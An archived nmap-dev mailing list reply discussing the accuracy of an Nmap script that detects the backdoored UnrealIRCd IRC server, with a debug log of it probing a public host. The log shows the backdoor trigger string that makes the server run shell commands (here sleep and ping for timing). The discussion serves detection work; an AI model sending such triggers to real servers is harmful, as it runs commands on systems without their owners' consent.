Nmap Development mailing list archives
Re: Always practice safe software: a lesson from UnrealIRCd
From: David Fifield <david () bamsoftware com>
Date: Wed, 23 Jun 2010 18:38:05 -0600
On Wed, Jun 23, 2010 at 07:21:23PM -0500, Ron wrote:
I found a better way to detect vulnerable servers, but unfortunately it isn't something an average person can do (requires a DNS authoritative server).From the original list, with a 20 second delay and 40 second timeout,on the list you provided earlier, I found: o 4 vulnerable servers o 3 were discovered o 1 false positive o 1 was missed because of 'too many reconnects' So, that isn't very good. We can make the delays even longer, and I think it'll get rather accurate, but I don't think that's ideal, either. I'm going to give mutex a shot, still.
Ah, so the timing is accurate enough, but it's not really an accurate reflection of whether the vulnerability exists. I tried using irc-unrealircd-backdoor.command to ping a server, and against all the 9- and 11-second hosts, a vulnerability was detected but I didn't receive any pings. It looks like the delay is really being caused by a lack of an auth response. Discovered open port 6667/tcp on 91.121.137.140 NSE: Starting irc-unrealircd-backdoor against 91.121.137.140:6667. NSOCK (0.5030s) TCP connection requested to 91.121.137.140:6667 (IOD #2) EID 16 NSOCK (0.6610s) Callback: CONNECT SUCCESS for EID 16 [91.121.137.140:6667] NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | CONNECT NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1 NSOCK (0.6700s) Write request for 50 bytes to IOD #2 EID 75 [91.121.137.140:6667]: AB||SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1. NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667] NSOCK (0.6900s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 106 NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes) NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname... NSOCK (0.8420s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 154 NSOCK (0.9770s) Callback: READ SUCCESS for EID 154 [91.121.137.140:6667] (100 bytes) NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead NSOCK (0.9940s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 178 NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes) NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username prefixed with ~ NSOCK (12.4170s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 274 NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes): :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered.. NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered David Fifield _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: Always practice safe software: a lesson from UnrealIRCd, (continued)
- Re: Always practice safe software: a lesson from UnrealIRCd Vlatko Kosturjak (Jun 14)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 14)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 18)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 22)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 22)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 22)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 22)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 23)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 23)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 23)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 23)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 24)
- Re: Always practice safe software: a lesson from UnrealIRCd Patrick Donnelly (Jun 24)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 25)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 25)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 30)
- Re: Always practice safe software: a lesson from UnrealIRCd Vlatko Kosturjak (Jun 13)